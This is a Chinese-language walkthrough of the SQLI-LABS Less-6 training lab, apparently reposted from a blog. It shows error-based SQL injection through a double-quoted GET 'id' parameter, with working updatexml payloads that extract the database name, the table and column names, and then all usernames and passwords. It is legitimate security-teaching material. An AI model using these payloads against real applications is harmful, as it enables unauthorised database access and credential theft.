Less-6(GET-Double injection-Double Quotes-String)
打开 Less-6
页面,可以看到页面中间有一句 Please input the ID as parameter with numeric value
,那么先使用 ID
这个参数通过 GET
方式传入一个数值。
确定注入点
注入语句: ?id=1
。
从上图可以看出传入 id=1
并没有回显查询结果,接着试一下 ?id=1'
,并没有任何异常,那么尝试一下 ?id=1"
,发现在 引号
附近产生歧义导致了报错。并且通过报错信息可以看出闭合SQL语句时用的是 双引号
。这时可以考虑使用 报错注入
(有关报错注入)。
使用注入语句: ?id=1" --+
看看是否能够正常闭合并注释,从下图看出是没有问题的。
确定当前数据库名
注入语句: ?id=1" and updatexml(1,concat(0x7e,(select database())),1) --+
。其中, concat
函数用于连接两个字符串,形成一个字符串, concat('a','b')='ab'
,这样当爆出多个信息时,可以通过 ~
进行分割。
从报错信息中可以看出,当前数据库为
security
。
确定数据库中的数据表
注入语句: ?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --+
确定users表中的列名
注入语句: ?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database())),1) --+
通过上述注入可以得知
users
表中存在三列,分别为 id
、 username
、 password
。
确定users表中的用户名和密码
注入语句: ?id=1" and updatexml(1,concat(0x7e,substring((select group_concat(concat(username,'^',password)) from users),1,31)),1) --+
从上图可以看出,爆出的账号密码长度超出了32,所以需要继续使用
substring()
函数每隔32位截取一次,最终拼凑出全部内容。
至此,就得到了当前表中所有的用户名和密码。
Original: https://www.cnblogs.com/Timesi/p/16661415.html
Author: 顾北清
Title: SQLI-LABS(Less-6)
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/578211/
转载文章受原作者版权保护。转载请注明原作者出处!